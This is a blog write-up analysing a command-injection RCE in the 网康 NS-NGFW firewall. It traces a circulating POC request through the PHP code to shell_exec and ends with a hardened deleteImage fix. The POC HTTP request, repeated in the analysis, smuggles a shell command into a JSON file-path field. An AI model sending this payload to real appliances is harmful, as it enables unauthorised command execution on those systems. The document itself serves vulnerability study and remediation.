c1ay's blog

2021 HW summary: reproduction and analysis of the 网康 NS-NGFW RCE

Word count: 685 | Reading time: 3 min
2021/04/29

The circulating POC

POST /directdata/direct/router HTTP/1.1
Host: xxx
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 160
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/11.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

Vulnerability analysis

The directory structure shows that the developers used the Zend Framework PHP framework.

Following the request route /directdata/direct/router leads to the entry point of the vulnerability:

the routerAction method in applications/directdata/controllers/DirectController.php


Follow the static method run of the Ext_Direct class called here: Ext_Direct::run($this->getRequest())

in applications/Models/Ext/Direct.php


Continue into Ext_Direct_Request::factory($request), called inside the run method

which leads to applications/Models/Ext/Direct/Request.php


Here the POSTed data is read with file_get_contents('php://input'); from the POC above, the content received at this point is:

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/11.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

Print the json_decode of this string to see what it contains:


After json_decode the data looks like this:

object(stdClass)#1 (6) {
  ["action"]=>
  string(15) "SSLVPN_Resource"
  ["method"]=>
  string(11) "deleteImage"
  ["data"]=>
  array(1) {
    [0]=>
    object(stdClass)#2 (1) {
      ["data"]=>
      array(1) {
        [0]=>
        string(47) "/var/www/html/d.txt;whoami>/var/www/html/11.txt"
      }
    }
  }
  ["type"]=>
  string(3) "rpc"
  ["tid"]=>
  int(17)
  ["f8839p7rqtj"]=>
  string(1) "="
}

So the data held in the $data variable satisfies the condition in the following code:

if (
    is_object($data) && $data->type && $data->tid &&
    $data->action && $data->method
)
    return new Ext_Direct_Request(
        $data->type, $data->tid, $data->action,
        $data->method, $data->data
    );

This initialises an Ext_Direct_Request object from the decoded data, which is then returned by Ext_Direct_Request::factory($request).

applications/Models/Ext/Direct/Request.php


Finally, when execution reaches call_user_func_array in the run function of applications/Models/Ext/Direct.php, the deleteImage method of the SSLVPN_Resource class is called with the following arguments:

array(1) {
  [0]=>
  object(stdClass)#2 (1) {
    ["data"]=>
    array(1) {
      [0]=>
      string(47) "/var/www/html/d.txt;whoami>/var/www/html/11.txt"
    }
  }
}

Locating the SSLVPN_Resource class leads to the deleteImage method in applications/Models/SSLVPN/Resource.php:


The $params variable passed in here contains:

object(stdClass)#2 (1) {
  ["data"]=>
  array(1) {
    [0]=>
    string(47) "/var/www/html/d.txt;whoami>/var/www/html/11.txt"
  }
}

Finally, when shell_exec is executed, the attacker-controlled input /var/www/html/d.txt;whoami>/var/www/html/11.txt is concatenated into the $cmd argument, producing command execution.
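As an added example (not the vendor's code, which the post shows only in screenshots), this is how a deleteImage handler can be written so that a payload like the one above is never meaningful: the file is removed with unlink() instead of a shell command, and the name is validated and containment-checked first. IMAGE_DIR, the extension list and the helper names are assumptions.

```php
<?php
// Added example, not the vendor's code. A hardened shape for the deleteImage
// handler discussed above: the original (visible only in the post's
// screenshots) splices $params->data into a shell command; this version never
// calls a shell. IMAGE_DIR and the allowed extensions are assumptions.
const IMAGE_DIR = '/var/www/html/sslvpn/images';   // assumed upload directory
const IMAGE_EXTS = ['png', 'jpg', 'jpeg', 'gif'];  // assumed allow-list
final class PathRejected extends RuntimeException {}

/** Map a user-supplied image name to a real file inside IMAGE_DIR, or throw.
 *  Only a bare file name is accepted, so '/', ';', '>' and '..' are never
 *  meaningful, and the resolved path is re-checked for containment. */
function resolveImagePath(string $userPath): string
{
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,128}\z/', $userPath) || $userPath[0] === '.') {
        throw new PathRejected("rejected image name: $userPath");
    }
    $ext = strtolower(pathinfo($userPath, PATHINFO_EXTENSION));
    if (!in_array($ext, IMAGE_EXTS, true)) {
        throw new PathRejected("disallowed extension: $userPath");
    }
    $base = realpath(IMAGE_DIR);
    $real = realpath(IMAGE_DIR . '/' . $userPath);   // false if the file is missing
    if ($base === false || $real === false
        || strncmp($real, $base . '/', strlen($base) + 1) !== 0) {
        throw new PathRejected("outside image directory: $userPath");
    }
    return $real;
}

/** Hardened deleteImage: same Ext.Direct calling convention, no shell_exec. */
function deleteImageHardened(stdClass $params): array
{
    $result = [];
    foreach ((array) ($params->data ?? []) as $p) {
        $p = (string) $p;
        try {
            $result[$p] = unlink(resolveImagePath($p)) ? 'deleted' : 'failed';
        } catch (PathRejected $e) {
            error_log('deleteImage: ' . $e->getMessage());   // audit the attempt
            $result[$p] = 'rejected';
        }
    }
    return $result;
}

// The data object from the POC above is rejected before any file system call.
$poc = json_decode('{"data":["/var/www/html/d.txt;whoami>/var/www/html/11.txt"]}');
var_dump(deleteImageHardened($poc));
```

Rejected names are written to the error log, which also gives the operations team a signal to alert on when this endpoint receives paths with shell metacharacters.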
